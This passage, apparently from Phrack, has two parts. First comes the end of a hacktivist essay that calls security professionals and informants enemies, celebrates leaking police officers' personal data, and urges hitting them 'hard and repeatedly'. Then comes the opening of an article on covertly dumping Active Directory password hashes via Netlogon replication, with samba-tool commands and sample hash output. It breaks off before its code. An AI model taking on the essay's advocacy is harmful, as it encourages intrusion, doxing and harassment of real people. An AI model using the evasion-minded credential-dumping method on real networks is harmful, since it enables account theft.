Dead Cow and old-school hacker space l0pht. Peiter eventually "went
|
|
straight" when they formed security consulting firm @Stake which was later
|
|
acquired by Symantec. Now he's completed the vicious circle from teenage
|
|
hacker to "security professional" to full blown military employment,
|
|
serving as an example to aspiring hackers as what NOT to do. Mudge has now
|
|
been speaking at hacker conferences like Schmoocon as well as various DARPA
|
|
Industry Day events in an attempt to recruit more hackers into the DARPA
|
|
fold. Hackerspaces, which are becoming a growing trend not only in the US
|
|
but also internationally, are often strapped for cash to pay rent or
|
|
purchase equipment, and because of unique problem-solving skills and a DIY
|
|
hacker ethic are being looked at by employers in both private and
|
|
government fields. Unfortunately, many hackerspaces are "non-political"
|
|
and are mostly composed of people more interested in a career than the
|
|
hacker ethic, making many especially vulnerable to pressure to do research
|
|
for the military or inform on other hackers to law enforcement.
|
|
|
|
Hackerspaces aren't unique for being wishy-washy and apathetic in this
|
|
regard: hackers in the US have a long history of big names going federal.
|
|
Adrian Lamo, once known as the "homeless hacker" after turning himself in
|
|
for breaking into several high profile news websites, is now universally
|
|
hated as the dirty snitch who turned in alleged WikiLeaks leaker Bradley
|
|
Manning. Despite this, Adrian still openly affiliates with 2600-- running
|
|
their facebook group, making occasional appearances on IRC, and most
|
|
recently being invited to speak on a panel at the 2010 HOPE convention.
|
|
Then there's Kevin Mitnick-- whose social engineering skills somehow
|
|
qualify him as some sort of spokesperson for hackers-- who has resigned
|
|
himself (like so many others) to the "industry" doing professional security
|
|
consulting and making big bucks giving speeches and signing books at
|
|
conferences (and like so many others he has become a target of black hats
|
|
who have repeatedly owned his servers and released his private emails and
|
|
passwords) Jeff "The Dark Tangent" Moss, who for more than a decade headed
|
|
the "largest underground hacking convention" DEFCON and the
|
|
grossly-misnamed Black Hat Briefings ended up working for the Department of
|
|
Homeland Security. Then Oxblood Ruffin from the "underground" group Cult
|
|
of the Dead Cow (which was also owned hard by black hats) runs his mouth on
|
|
Twitter claiming "ownership" of the term "hacktivism" while repeatedly
|
|
denouncing other hackers(specifically "black hats" and "anonymous") who
|
|
break into and attack systems, going so far as to sign a joint statement by
|
|
cDc, 2600, l0pht, CCC and others condemning Legion Of The Underground's
|
|
attacks against the Iraqi government for human and civil rights abuses [8].
|
|
|
|
Another more recent example of treachory in the hacker community is the
|
|
case of 'security consultant' Thomas Ryan (aka frogman) who infiltrated and
|
|
released internal mailing list communications for the NYC Occupy Wallstreet
|
|
protesters. For months he worked his way in, gaining access and trust,
|
|
while at the same time forwarding protest plans to the FBI and several news
|
|
organizations, eventually dumping everything to right-winger Andrew
|
|
Breitbart's website as "proof" of "illegal anarchist activities". In the
|
|
same files he released he accidentally included his own correspondence with
|
|
the FBI and news organizations (some "security professional"). Thomas
|
|
Ryan's white hat and right-wing leanings were rather well known in hacker
|
|
circles, as well as his social engineering exploits (he previously spoke at
|
|
the "black hat briefings" about his experiences tricking dozens of
|
|
government employees and security cleared professionals by using a fake
|
|
profile of an attractive and skilled woman named "Robin Sage":
|
|
unfortunately he did not dump any private or embarassing information on his
|
|
white hat brethren). Certainly the primary point of failure for OWS was
|
|
poor security culture, trusting an already well-known reactionary white hat
|
|
to their internal communications and protest details (a weakness of an
|
|
open-source movement as opposed to closed private collectives composed of
|
|
vouched-in members). However when this betrayal falls from our own hacker
|
|
tree, we need to take responsibility and discourage future treachory (like
|
|
how Aaron Barr was served by Anonymous).
|
|
|
|
Then there's 2600 which is composed of several separate communities
|
|
including the local meetups, the magazine, Off The Hook, and the IRC
|
|
community. To be fair, Eric Corley is somewhat friendly to the interests of
|
|
hackers, supporting digital rights, criticizing the police state, and being
|
|
generally left-leaning. But upon closer inspection you'll find a very
|
|
disturbing militaristic anti-wikileaks, anti-EFF and straight up
|
|
anti-hacker mentality held by many of the people involved: half the ops on
|
|
2600net have no problem openly bragging about working for the military or
|
|
collaborating with law enforcement. Just like ten years ago in their
|
|
condemnation of LoU, 2600 released a statement in December condemning
|
|
Anonymous ddos attacks against the banks and credit card corporations that
|
|
were ripping off WikiLeaks [9] (a tactic that is nothing more than a
|
|
digital version of a sit-in, a respected tradition of civil disobedience in
|
|
US politics). Using the 2600 name to condemn Anonymous actions not only
|
|
undermines our work but creates the false impression that the hacker
|
|
community does not support actions against PayPal in support of Wikileaks.
|
|
More than six months later, the FBI carried out raids at the homes of
|
|
several dozen alleged Anonymous "members" who were purportedly involved
|
|
with carrying out the LOIC attacks against PayPal. In light of how dozens
|
|
of people (who may not even have been involved at all) may be facing
|
|
decades in prison for some bogus trumped up federal conspiracy charges,
|
|
what kind of credibility should be given to 2600 who clearly has no regard
|
|
for practicing solidarity with hackers facing unjust persecution?
|
|
|
|
The 2600net IRC network itself is run by a DoD-cleared, Infragard-trained
|
|
"r0d3nt" named Andrew Strutt who works for a military-contracted company
|
|
and has in the past openly admitted to working with law enforcement to bust
|
|
people he claims were running botnets and distributing child porn. Andrew
|
|
Strutt's interview for GovExec.com [10] read: "'I've had to work hard to
|
|
build up trust,' Strutt adds that he doesn't disclose his identity as a
|
|
hacker to the people he refers to as his handlers. And he doesn't advertise
|
|
to hackers that he works for the .mil or .gov community either". Most
|
|
recently, r0d3nt voluntarily complied with a grand jury subpoena where he
|
|
gave up the shell server "pinky" to the feds and kept quiet about it for
|
|
months [11]. The shell server had several hundred accounts from other
|
|
members of the 2600 community who now have the displeasure of knowing that
|
|
law enforcement forensics are going through all their files and
|
|
.bash_history logs. Strutt kept this a secret from everybody for months
|
|
(complying with a clearly illegal "gag order") and has since been very
|
|
vague about details, refusing to answer questions as to the specifics of
|
|
the investigation except that law enforcement was looking for "a certain
|
|
user"'s activity on the box. Of course it is reckless and stupid to use a
|
|
community shell server to carry out attacks putting other users on the box
|
|
in danger, but this is something you should be prepared for well ahead of
|
|
time if you put yourself in such a place. Many ISPs that host websites and
|
|
listservs for radicals and hackers not only have a clearly defined privacy
|
|
policy reducing the amount of personally identifiable information on the
|
|
box, but also have a "will not comply" statement that says they will never
|
|
voluntarily give up the box. This was demonstrated in November 2009 where
|
|
IndyMedia.us received a similar gag order and subpoena asking for log files
|
|
on the server (which never existed in the first place). The folks there
|
|
immediately got the EFF involved and publicly announced the government's
|
|
unjust fishing expedition, saying they had no plans on complying. In the
|
|
end, nothing was given up and the gag order was found to be
|
|
unconstitutional [12].
|
|
|
|
Why do many of the big name hackers that are seen as role models end up
|
|
being feds and corporate sellouts, and why are these people still welcomed
|
|
and tolerated in the scene? Eric Corley of 2600 estimated that a quarter of
|
|
hackers in the US are FBI informants [13], which is unfortunately an
|
|
astonishingly high figure compared to other fields. Experienced criminals
|
|
who have done prison time will tell you that the code of the street is
|
|
don't trust anybody and don't rat. If you ask many younger hackers,
|
|
they'll casually joke about breaking into systems in their youth but if
|
|
they ever grow up or get busted they'll be working for the government.
|
|
Dealing with the devil never ends up well for anyone involved: all they
|
|
want to do is bust other hackers, and in the end after using and abusing
|
|
their informants they often kick them to the curb.
|
|
|
|
Albert Gonzales (aka "soupnazi", "cumbajohnny", and "segvec") became an
|
|
informant after he was busted in NYC for credit card fraud and was paid
|
|
$75,000 to infiltrate carding websites like ShadowCrew. Despite his
|
|
cooperation with the Secret Service where he sent several dozen hackers and
|
|
fraudsters to prison as part of Operation Firewall, the feds STILL indicted
|
|
Gonzales on some fresh credit card fraud charges of his own and sent his
|
|
rat ass away for several decades. Unfortunately one of the people roped
|
|
into Gonzales' web of deception was the notorious black hat Stephen Watt
|
|
"the unix terrorist" who helped write old school zines like el8 and left a
|
|
trail of mail spools, ownage logs, and rm'd servers of the most respected
|
|
"security professionals" in the industry. Watt was never even charged with
|
|
participating in any of Gonzales' money schemes but simply wrote some
|
|
common packet sniffing code called 'blabla' which was supposedly used to
|
|
help intercept credit card transactions in TJX's networks, demonstrating
|
|
how depraved and desperate the feds are to make quotas and inflate the
|
|
threat of hacker fraud artists in the media [14].
|
|
|
|
While many support our fallen hacker comrades like the Unix Terrorist, we
|
|
still hear a startling line of thought coming out of the infosec community.
|
|
Ask around at your 2600 meeting or hackerspace and you'll hear a
|
|
condemnation of imprisoned hackers as being nothing more than criminals
|
|
along with a monologue comparable to politicians, police officers and the
|
|
media: don't break into other people's systems, don't ddos, don't drop dox
|
|
and if you find a vulnerability, "please please report it to the vendor so
|
|
it could be patched." To think this mentality is being perpetuated by
|
|
people who wave the hacker flag is disgusting and undermines the work that
|
|
many legit hackers have fought and went to prison for.
|
|
|
|
Because so many who claim to represent hackers end up working for the very
|
|
corrupt and oppressive institutions that other hackers are fighting
|
|
against, it is time to draw lines in the sand. If you are military, law
|
|
enforcement or informant, work for a DOD contracted company or a private
|
|
security firm hired to bust other hackers or protect the infrastructure we
|
|
aim to destroy, you are no comrade of ours. This is 2011, the year of leaks
|
|
and revolutions, and every day we hear about riots around the world, and
|
|
how major corporations and government systems are getting owned by hackers.
|
|
The papers have been describing recent events as a "cyberwar" (or more
|
|
accurately, a "hacker class war") and the way the attacks have become more
|
|
frequent and more damaging, this is not much of an exaggeration.
|
|
|
|
It is impossible to talk about contemporary hacktivism without mentioning
|
|
Anonymous, LulzSec and Antisec. Responsible for dramatically raising the
|
|
stakes of this "war," they have adopted an increasingly explicit
|
|
anti-government and anti-capitalist stance. The decentralized model in
|
|
which Anonymous operates parallels every successful guerrilla warfare
|
|
campaign waged throughout revolutionary history. In just a few months, they
|
|
have taken aim at the CIA, the United States Senate, Infragard, Sony, NATO,
|
|
AT&T, Viacom, Universal, IRCFederal, Booz Allen, Vanguard Defense
|
|
Industries, as well as Texas, Missouri, Alabama, Arizona, Boston, and other
|
|
police departments -- dropping massive username/password lists,
|
|
confidential law enforcement documents, personal email correspondence and
|
|
more. The latest campaign -- "Operation Antisecurity" -- is designed to
|
|
unite other hacker groups, tipping their hats to old school antisec days
|
|
while bringing more attention to anti-government black hat politics as has
|
|
never before seen [15]. Although the attack methods being utilized have
|
|
been relatively primitive-- ranging from common web application
|
|
vulnerabilities like RFI/LFI and SQL injection, to brute force DDOS and
|
|
botnet attacks-- there are signs that their attack methodology is becoming
|
|
more sophisticated, especially as talent from allied hacker crews becomes
|
|
involved. Additionally choice of targets are going after our bigger
|
|
enemies: while past incarnations of antisec have humiliated many well-known
|
|
sellouts in the computer security industry, today's blackhats are not
|
|
scared to hit higher profile figures in law enforcement, military, and
|
|
governments most notably by mercilessly dropping usernames, passwords, home
|
|
addresses and phones, and social security numbers to tens of thousands of
|
|
police and military officials.
|
|
|
|
As hackers continue to expose and attack corruption, law enforcement will
|
|
desperately continue to try to make high-profile arrests regardless of
|
|
actual guilt or association. Especially as politicians continue to try to
|
|
classify hacktivism as an act of cyber-terrorism (which can be retaliated
|
|
against as traditional acts of war [16]), the threat of prison is very real
|
|
and people should be well prepared ahead of time for all possible
|
|
repercussions for their involvement. We should not, however, let the fear
|
|
of government repression scare us into not taking action; instead, we
|
|
should strengthen our movement by practicing better security culture and
|
|
working to support other hackers who get busted in the line of duty. Even
|
|
though there are plenty of guides out there on how to become "anonymous",
|
|
many mistakes have already been made: trusting the mentally unstable 19
|
|
year old Ryan Cleary to run the LulzSec IRC server, for example. Even
|
|
before he was actively cooperating with the feds after being arrested in a
|
|
joint US-UK operation, Ryan was already known to double-cross other
|
|
hackers, having posted IP information of hundreds of anonops IRC users
|
|
[17][18]. Although it's righteous to out snitches and movement traitors to
|
|
the public, doxing other hackers involved in the struggle is only making
|
|
law enforcement's job easier to identify and prosecute our comrades. Now
|
|
more than ever should folks unite and practice solidarity with each other,
|
|
setting aside our differences to go after our common enemies.
|
|
|
|
The events over the past few months have been compared to the glory days of
|
|
the 90s, complete with IRC wars and major website defacements. As breaking
|
|
into computer systems becomes popularized and a new batch of young bloods
|
|
are emerging on the scene, many questions remain. Is government going to
|
|
make more arrests and pass more draconian laws? Would they be doing the
|
|
same thing anyway-- even if hackers weren't striking back? Is Anonymous
|
|
actually damaging the white-hat military and intelligence security
|
|
industries with the ownings, defacements, and leaks, or are they just
|
|
bringing heat on the underground while providing justification for more
|
|
government financing of our enemies? Is this just another script kiddie
|
|
scene thriving on sqlmap and milw0rm exploits or is there old school talent
|
|
behind the scenes owning shit to keep the antisec flame alive? Most
|
|
importantly, how can those fighting the hacker class war better coordinate
|
|
their work with street-level resistance movements?
|
|
|
|
As attacks intensify, no doubt governments will try to put more money into
|
|
defending their infrastructure, holding more internal security trainings,
|
|
and passing more laws increasing penalties for computer hacking as well as
|
|
censoring and invading our privacy. The government propaganda machine will
|
|
no doubt blame hackers as some sort of cyber-Al Queda to demonstrate the
|
|
need for heightened security. Don't get it twisted: they have always wanted
|
|
to pass these laws in the first place and would have done so with or
|
|
without using the hacker threat as scapegoat, just as they wanted to go
|
|
invade Afghanistan and Iraq and pass the PATRIOT Act before 9/11 ever
|
|
happened. Don't be scared by ridiculous statements like FBI deputy
|
|
assistance Steven Chabinsky who announced regarding the anonymous PayPal
|
|
arrests, "We want to send a message that chaos on the Internet is
|
|
unacceptable, [even if] hackers can be believed to have social causes, it's
|
|
entirely unacceptable to break into websites and commit unlawful acts".
|
|
Yes, the feds will continue to paint us as terrorists whether we act or not
|
|
and will continue to make sweeping arrests regardless of guilt or innocence
|
|
in an attempt to demonstrate that they aren't losing the cyberwar after all
|
|
when all signs show that they are. It's widely speculated that the
|
|
unexpected resignation of US-CERT director Randy Vickers is related to the
|
|
dramatic increase in high-profile internet attacks against government
|
|
institutions [20].
|
|
|
|
Another sign of success is how the threat of being targeted by Anonymous
|
|
and other anti-censorship activists could possibly scare the companies into
|
|
not going forward with their plans, which is exactly what happened to
|
|
Australian ISP Telstra [20]. A practice that seems to have been revived
|
|
from old school black hat days is the targeting of security professionals
|
|
and hackers who choose to sell out and work for corporations and
|
|
governments to protect their systems. This is an effective strategy
|
|
because not only are they ridiculously incompetent and corrupt low-hanging
|
|
fruit, but they likely hold private information on the cyberwar activities
|
|
of the military. Additionally, hitting them hard and repeatedly will serve
|
|
as a warning to others who would follow their lead and sell out their
|
|
skills to the enemy: think twice before you find yourself in the
|
|
crosshairs. What would happen when the government invests all this money to
|
|
hire more hackers to protect their systems, but no one showed up?
|
|
|
|
Hackers may brag about their antics instantly getting international news
|
|
coverage but the offensive cyber operations of the US military are
|
|
considerably quieter. Not only does this keep their enemies from knowing
|
|
their capabilities but also because much of the work being done is likely
|
|
illegal. As the saying goes, those who make the laws are allowed to break
|
|
them. When teenagers hack into high profile systems, they're considered
|
|
criminals and even terrorists; the governments and militaries of the world
|
|
do the same at greater magnitudes while hiding behind the guises of
|
|
national security or "spreading democracy." It might be a while before we
|
|
ever hear about some of the operations hackers working for the military are
|
|
involved in. Then again, it might not-- maybe they'll be the next ones
|
|
owned, having their private data plastered all over the Internet.
|
|
|
|
---
|
|
|
|
[1] "President lays out cyberwar guidelines, report says"
|
|
http://news.cnet.com/8301-13506_3-20073314-17/president-lays-out-cyberwar-
|
|
guidelines-report-says/
|
|
|
|
[2] "Stuxnet apparently as effective as a military strike"
|
|
http://arstechnica.com/tech-policy/news/2010/12/stuxnet-apparently-as-
|
|
effective-as-a-military-strike.ars
|
|
|
|
[3] "Eagle Soars to Top of NPS"
|
|
http://www.navy.mil/search/display.asp?story_id=2886
|
|
|
|
[4] "Poke in the Eye to SANS and CISSPs in Defcon 18 CTF Announcement"
|
|
http://sharpesecurity.blogspot.com/2010/04/poke-in-eye-to-sans-and-cissps-
|
|
in.html
|
|
|
|
[5] "Fuck FBI Friday Pretentious Press Statement"
|
|
http://LulzSecurity.com/releases/fuck_fbi_friday_
|
|
PRETENTIOUS%20PRESS%20STATEMENT.txt
|
|
|
|
[6] "How One Man Tracked Down Anonymous And Paid a Heavy Price"
|
|
http://www.wired.com/threatlevel/2011/02/anonymous/all/1
|
|
|
|
[7] "Hacker 'Mudge' Gets DARPA Job"
|
|
http://news.cnet.com/8301-27080_3-10450552-245.html
|
|
|
|
[8] "Joint Statement Condemning LOU Cyberwar"
|
|
http://www.2600.com/news/view/article/361
|
|
|
|
[9] "Press Release - 2600 Magazine Condemns Denial of Service Attacks"
|
|
http://www.2600.com/news/view/article/12037
|
|
|
|
[10] "Hiring Hackers"
|
|
http://www.govexec.com/features/1110-01/1110-01s1.htm
|
|
|
|
[11] "Statement regarding Seizure of pinky.ratman.org shell server."
|
|
http://foster.stonedcoder.org/~r0d3nt/statement.txt
|
|
|
|
[12] "From EFF's Secret Files: Anatomy of a Bogus Subpoena"
|
|
https://www.eff.org/wp/anatomy-bogus-subpoena-indymedia
|
|
|
|
[13] "One in Four Hackers in the U.S. is an FBI Informant"
|
|
http://publicintelligence.net/one-in-four-hackers-in-the-u-s-is-an-fbi-
|
|
informant
|
|
|
|
[14] "TJX Hacker Was Awash in Cash; His Penniless Coder Faces Prison"
|
|
http://www.wired.com/threatlevel/2009/06/watt/
|
|
|
|
[15] "50 Days of Mayhem: How LulzSec Changed Hacktivism Forever"
|
|
http://www.pcmag.com/article2/0,2817,2387716,00.asp
|
|
|
|
[16] "Pentagon to Consider Cyberattacks Acts of War"
|
|
http://www.nytimes.com/2011/06/01/us/politics/01cyber.html
|
|
|
|
[17] "Teenage 'Cyber Hacker' Son is Accused of Bringing Down 'British FBI'
|
|
Site"
|
|
http://www.dailymail.co.uk/news/article-2007345/Ryan-Cleary-Hacker-accused-
|
|
bringing-British-FBI-site.html
|
|
|
|
[18] "LOL ANONOPS DEAD"
|
|
https://sites.google.com/site/lolanonopsdead/
|
|
|
|
[19]"Agency Chief Tasked With Protecting Government Networks From Cyber
|
|
Attacks Resigns"
|
|
http://www.huffingtonpost.com/2011/07/25/chief-protecting-government-
|
|
networks-resigns_n_909116.html
|
|
|
|
[20] "Anonymous and LulzSecs Existence Scares ISP into Halting Web
|
|
Censorship"
|
|
http://www.zeropaid.com/news/93950/anonymous-and-LulzSecs-existence-scares-
|
|
isp-into-halting-web-censorship/
|
|
|
|
[21] "FBI Director Mueller Explains FBI Priorities 10 Years after 9/11"
|
|
http://theiacpblog.org/2011/10/25/fbi-director-mueller-explains-fbi-
|
|
priorities-10-years-after-911/
|
|
|
|
[ EOF ]
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x11 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-----=[ Abusing Netlogon to steal an Active Directory's secrets ]=-----=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-----------------------=[ by the p1ckp0ck3t ]=-----------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------=[ anonymous_7406da@phrack.org ]=-------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
<<<->>>
|
|
|
|
+ Prologue
|
|
+ Common tools & appropriate warnings!
|
|
+ Meet the Samba 4 project
|
|
+ Digging into the Netlogon replication mechanism
|
|
+ Extracting the secrets
|
|
+ A practical introduction to S4 (Stealth & Secure Secret Stealer)
|
|
+ S4 .VS. Windows 2008 Domain Controllers
|
|
+ Additional details
|
|
+ Last words
|
|
+ Bibliography
|
|
+ c0de: S4
|
|
|
|
<<<->>>
|
|
|
|
|
|
---[ 1 - Prologue
|
|
|
|
|
|
If you've been hacking around Windows networks then you must be more than
|
|
familiar with common LSA dumping tools such as pwdump [01] & co. You must
|
|
also know that they are not only detected by (most?) AV, but furthermore
|
|
that they may not work the expected way when an AV/HIPS is installed on
|
|
your target. In the worst case a box may even crash! It's fucking annoying.
|
|
|
|
In a Windows network, crashing a workstation is probably harmless (natural
|
|
Windows behavior you could say) because administrators won't notice and its
|
|
user will only complain. He may also kick the box, blame "fucking M$" and
|
|
ultimately reboot it. But in the end, we all know that he will rather focus
|
|
on the recovery of his Office document than look for evidence (assuming he
|
|
has the required skills to begin with). The situation is entirely different
|
|
when it comes to Windows servers and especially DC (Domain Controllers).
|
|
For these kinds of target, one needs to be *very* cautious because an
|
|
administrator would find a crash *very* suspicious.
|
|
|
|
This paper presents a (hopefully) new technique to retrieve the AD (Active
|
|
Directory [02])'s secrets using one of its (natural) replication mechanisms
|
|
when a DC or a domain administrator's account has been compromised. Because
|
|
it's solely based on the Windows API -without any hooks or (too) dirty
|
|
tricks- it's a quiet efficient way to retrieve domain users' hashed
|
|
passwords.
|
|
|
|
|
|
---[ 2 - Common tools & appropriate warnings!
|
|
|
|
|
|
Let me first begin by a bit of bitching regarding what's already available
|
|
out there. There are a lot of tools dealing with "online" password dumping,
|
|
most being open source, a few of them being however commercial software (I
|
|
haven't tested those). Judging from my experience (and that of many
|
|
friends) I can tell you that only a few of them are *really* of interest. I
|
|
won't fill a bug report -:]- but remember that a good password dumping tool
|
|
should provide:
|
|
|
|
1. Stability: Using such a tool should *never* be risky for the target's
|
|
safety. Interactions with LSASS are really intrusive and
|
|
dangerous and should be avoided if possible. You wouldn't
|
|
use a kernel sploit without having first understood how
|
|
and why it's working right? Same thing here. Crashing
|
|
LSASS means crashing the box!
|
|
|
|
2. Stealthiness: You should never take the risk to be caught by some
|
|
AV/HIPS. It's no news that there are Windows APIs that you
|
|
can't use anymore and it's obvious that binaries provided
|
|
by a famous security website have a good chance to be
|
|
detected.
|
|
|
|
Take for example the case of fgdump & gsecdump. Both are great tools with a
|
|
very good chance to succeed. But, can you seriously trust software that:
|
|
|
|
- Hook well known LSASS functions (using even more known techniques)?
|
|
(pwdump6 of fgdump)
|
|
- Parse internal LSASS memory? (gsecdump)
|
|
- Write well known (=> detected) dll & exe files on disk? (fgdump)
|
|
- Start new services? Stop AV services? (fgdump)
|
|
- Are closed source? (gsecdump)
|
|
|
|
Especially with poorly designed AV/HIPS running on the same machine? Don't
|
|
take me wrong, I'm not dissing pwdump* (or the similar) tools especially
|
|
since they are necessary; but at least patch them a bit, you moron! In the
|
|
case of a workstation target, there are no other public alternatives. But
|
|
there's another story in the case of a DC target. What can be done in this
|
|
matter?
|
|
|
|
Let me tell you the story that months later would lead me to this paper.
|
|
Because it's a story, some details are missing, especially in the reverse
|
|
engineering work performed. The idea is to keep the paper simple, as well
|
|
as to give you the opportunity to find the last pieces of the puzzle all by
|
|
yourself; follow the hints, hacker :]
|
|
|
|
|
|
---[ 3 - Meet the spart^wSamba 4 project
|
|
|
|
|
|
Unix people are well aware of the Samba project but only a few of them are
|
|
truly aware of how incredible this project really is. This is not just
|
|
about mounting CIFS volumes, but a complete reverse engineering/rewrite of
|
|
several parts of Windows. Kudos to the Samba team.
|
|
|
|
A few years ago, the Samba team decided to start a new branch of their
|
|
project: Samba 4 [03]. The goal was to provide an even deeper integration
|
|
of a Samba server inside an Active Directory. Now with Samba 4, a Unix
|
|
computer can become a (RO)DC and what's even more incredible is that it's
|
|
as easy (well if you're lucky) as typing:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
# samba-tool join FOO.BAR DC -Uadministrator@foo.bar --realm=FOO.BAR
|
|
---------------------------------------------------------------------------
|
|
|
|
This command (dc)promotes our Linux box in the AD (in this case the domain
|
|
is foo.bar). It's easy to check that it's indeed properly registered as a
|
|
legitimate DC using for example an LDAP query:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
$ ldapsearch -x -LLL -h dc1.foo.bar -D "administrator@foo.bar" -W -b
|
|
"OU=Domain Controllers,dc=foo,dc=bar" "(objectClass=Computer)" cn
|
|
Enter LDAP Password: *******
|
|
dn: CN=DC1,OU=Domain Controllers,DC=foo,DC=bar
|
|
cn: DC1 <-- first DC
|
|
|
|
dn: CN=MEDIA,OU=Domain Controllers,DC=foo,DC=bar
|
|
cn: MEDIA <-- second DC = our proud little Linux
|
|
---------------------------------------------------------------------------
|
|
|
|
As all traditional DC functions are properly running, Kerberos services are
|
|
running as well to authenticate domain users whenever it is required:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
# samba-tool samdump
|
|
[...]
|
|
Administrator:500:BAC14D04669EE1D1AAD3B435B51404EE:\
|
|
FBBF55D0EF0E34D39593F55C5F2CA5F2:[UX]:LCT-4F1B2611
|
|
Guest:501:NO PASSWORDXXXXXXXXXXXXXXXXXXXXX:\
|
|
NO PASSWORDXXXXXXXXXXXXXXXXXXXXX:[NDUX]:LCT-00000000
|
|
krbtgt:502:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:\
|
|
D25E142705B3C1B9122309D194E0B36F:[DU]:LCT-4F1B1EFC
|
|
SUPPORT_388945a0:1001:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:\
|
|
4CB5D040611B3FF00F17AF7DC344F97C:[DUX]:LCT-4F1B196F
|
|
DC1$:1003:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:\
|
|
A59B7CDD1167816DFDD8C5F310ACCEC0:[S]:LCT-4F1B1F2F
|
|
tofu:1117:E91851A7E394D006ABD3B435B31404EE:\
|
|
15221599C25FA333EA6044C0513ADD45:[UX]:LCT-4F1B23FB
|
|
HAXOR$:1120:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:\
|
|
88369D133A118783D46D1C6344E99B08:[W]:LCT-4F1B366B
|
|
cheese:1121:BC5F4D08D49A0099AAD3B43CB51404EE:\
|
|
3E21E05DD9E4E790CB3783D9292F80F7:[UX]:LCT-4F1BE1F2
|
|
MEDIA$:1122:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:\
|
|
72CCE806701E837DCBB33B29A9D48E97:[S]:LCT-4F1C3AB1
|
|
[...]
|
|
---------------------------------------------------------------------------
|
|
|
|
When I discovered how mature the Samba 4 project had become and what it
|
|
allowed me to perform, I started to imagine how I could take advantage of
|
|
the situation. The first idea I came up with was to introduce a temporary
|
|
Samba 4 DC in the AD infrastructure, dump the passwords and immediately
|
|
dcpromote it again (=remove it from the AD). However this idea is really
|
|
bad regarding the criteria that I gave earlier:
|
|
|
|
- Stability: No matter how functional Samba 4 may appear, it's many
|
|
years too soon to use it for serious purpose. To give you an example,
|
|
I destroyed many testing environments as I was playing with Samba 4
|
|
(merely using it in fact).
|
|
|
|
- Stealthiness: I doubt there is even one person able to tell us how
|
|
many modifications the introduction of a new DC would bring in the
|
|
AD. Do you honestly think that you could introduce a DC, make it
|
|
disappear and that no administrator would ever be able to tell that
|
|
it was there? I'm not taking the risk and neither should you.
|
|
|
|
For these two reasons, it was wise to resign (interestingly, as I would be
|
|
told later, some French guy apparently didn't [04]).
|
|
|
|
At this point, I had no more ideas until I realized that network traffic
|
|
was exchanged between DC1 (another DC from the domain) and MEDIA when I was
|
|
typing the samdump command. More precisely, and thanks to Wireshark's
|
|
dissectors (courtesy of the Samba team), I was able to observe the
|
|
following events:
|
|
|
|
1. NTLM Authentication Protocol used to authenticate MEDIA
|
|
2. MEDIA binding on \\DC3.FOO.BAR\IPC$\lsarpc and calling
|
|
-> lsa_OpenPolicy2() (opnum 44)
|
|
-> lsa_QueryInfoPolicy2 (opnum 46)
|
|
3. MEDIA binding on \\DC3.FOO.BAR\IPC$\netlogon and calling
|
|
-> NetrServerReqChallenge (opnum 4)
|
|
-> NetrServerAuthenticate2 (opnum 15)
|
|
4. MEDIA binding again (*) on \\DC3.FOO.BAR\IPC$\netlogon and calling
|
|
-> NetrDatabaseSync (opnum 8)
|
|
-> NetrDatabaseSync (opnum 8)
|
|
-> NetrDatabaseSync (opnum 8)
|
|
|
|
(* Using 2 different binds in step 3 & 4 seems weird at first but it will
|
|
be explained later.)
|
|
|
|
I was immediately interested in the NetrDatabaseSync() function and googled
|
|
a bit to see if I could find some documentation. Fortunately, Microsoft
|
|
documents this function; it is a wrapper of NetrDatabaseSync2() [05].
|
|
|
|
-----------------------[ MS official documentation ]-----------------------
|
|
NTSTATUS NetrDatabaseSync2(
|
|
[in, string] LOGONSRV_HANDLE PrimaryName,
|
|
[in, string] wchar_t* ComputerName,
|
|
[in] PNETLOGON_AUTHENTICATOR Authenticator,
|
|
[in, out] PNETLOGON_AUTHENTICATOR ReturnAuthenticator,
|
|
[in] DWORD DatabaseID,
|
|
[in] SYNC_STATE RestartState,
|
|
[in, out] unsigned long* SyncContext,
|
|
[out] PNETLOGON_DELTA_ENUM_ARRAY* DeltaArray,
|
|
[in] DWORD PreferredMaximumLength
|
|
);
|
|
[...]
|
|
The NetrDatabaseSync2 method returns a set of all changes applied to the
|
|
specified database since its creation. It provides an interface for a BDC
|
|
to fully synchronize its databases to those of the PDC.
|
|
[...]
|
|
---------------------------------------------------------------------------
|
|
|
|
So, it seemed safe to assume that the network traffic observed was the
|
|
consequence of a synchronization mechanism. If you're familiar with Windows
|
|
networks then there is something that should immediately draw your
|
|
attention: the documentation is mentioning PDC (Primary Domain Controller)
|
|
& BDC (Backup Domain Controller) which are pre-Windows2000 (= NT4)
|
|
concepts. Indeed, Windows 2000 introduced Active Directory which uses a
|
|
different logic. Wikipedia [06] explains it perfectly:
|
|
|
|
-----------------[ Wikipedia: Primary Domain Controller ]------------------
|
|
In later releases of Windows, domains have been supplemented by the use of
|
|
Active Directory services. In Active Directory domains, the concept of
|
|
primary and secondary domain controller relationships no longer applies.
|
|
Primary domain controller emulators hold the accounts databases and
|
|
administrative tools. [...] The same rules apply; only one PDC may exist on
|
|
a domain, but multiple replication servers may still be used.
|
|
---------------------------------------------------------------------------
|
|
|
|
Note: "later releases" means Windows 2000 or above.
|
|
|
|
So I came up with the conclusion that Samba 4 was (and still is) using an
|
|
old -now emulated- mechanism to synchronize the AD database between its
|
|
DCs. More precisely in Active Directory, a unique DC holds the PDC FSMO
|
|
role [12], the other DCs being (emulated) BDC as a result. Now pay
|
|
attention to the "DatabaseID" parameter passed to NetrDatabaseSync2():
|
|
|
|
-----------------------[ MS official documentation ]-----------------------
|
|
DatabaseID: The identifier for a specific database for which the changes
|
|
are requested. It MUST be one of the following values.
|
|
|
|
Value Meaning
|
|
----- -------
|
|
|
|
0x00000000 Indicates the SAM database.
|
|
0x00000001 Indicates the SAM built-in database.
|
|
